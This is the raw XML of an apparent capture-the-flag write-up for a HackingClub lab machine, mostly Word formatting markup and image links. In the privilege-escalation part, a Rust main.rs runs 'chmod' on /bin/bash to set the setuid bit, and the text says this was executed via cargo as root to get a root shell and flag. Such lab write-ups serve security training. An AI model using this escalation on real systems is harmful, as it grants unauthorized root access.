          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">main.rs</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">execute a command as root, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">adding the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">setuid bit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">binary, allowing it to be executed with elevated privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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B">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main.rs</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EC">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D">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std::process::Command;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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Command::new("bash").arg("-c").arg("chmod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/bin/bash")</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F0">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tl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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.expect("fail");</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F2">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3">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println!("{}",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String::from_utf8_lossy(&amp;output.stdout));</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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5">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we executed the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">created projec</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">t so that the configured command would run with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">privileges.</w:t>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/root/.cargo/bin/cargo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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="103"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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">obtained root access</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the machine, successfully completing privilege escalation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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root flag</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is located in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F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952500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="104"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943600" cy="952500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln w="25400">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId55" w:type="default"/>
      <w:headerReference r:id="rId56" w:type="first"/>
      <w:headerReference r:id="rId57" w:type="even"/>
      <w:footerReference r:id="rId58" w:type="default"/>
      <w:footerReference r:id="rId59" w:type="first"/>
      <w:footerReference r:id="rId60"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widowControl w:val="0"/>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="-1276" w:right="289"/>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01">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.ekcctamc9a7f"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126" name="image41.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image4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02">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03">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115" name="image21.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image2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94"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Extract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94" name="image39.png"/>
              <a:graphic>
                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:pic>
                    <pic:nvPicPr>
                      <pic:cNvPr id="0" name="image39.png"/>
                      <pic:cNvPicPr preferRelativeResize="0"/>
                    </pic:nvPicPr>
                    <pic:blipFill>
                      <a:blip r:embed="rId2"/>
                      <a:srcRect/>
                      <a:stretch>
                        <a:fillRect/>
                      </a:stretch>
                    </pic:blipFill>
                    <pic:spPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="6686550" cy="3015679"/>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0.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.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com/channels/705946302105649153/1173705871046475796" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.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laboratory/competition-machines/302" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://app.hackingclub.com/laboratory/competition-machines/302" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://crackstation.net/" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://crackstation.net/" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/DominicBreuker/pspy" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://discord.com/channels/705946302105649153/1173705871046475796" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://crackstation.net/" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2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3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8QsdFR5nrGNfrhDE26qdpaP2fw==">CgMxLjAyDmguc2JscXN5a2Vmemp1Mg5oLmRwOXNuMm5mejlkbDIOaC5yaWo1bW51ZHc1bmoyDmguc2R5bHk1MTN1bTJ5Mg5oLjhsNXMyaTl5czJsNjIOaC5la2NjdGFtYzlhN2Y4AHIhMXp2NzM2N0ppR0ktMHFCU01ONlVpY1NUa085RGNocDM2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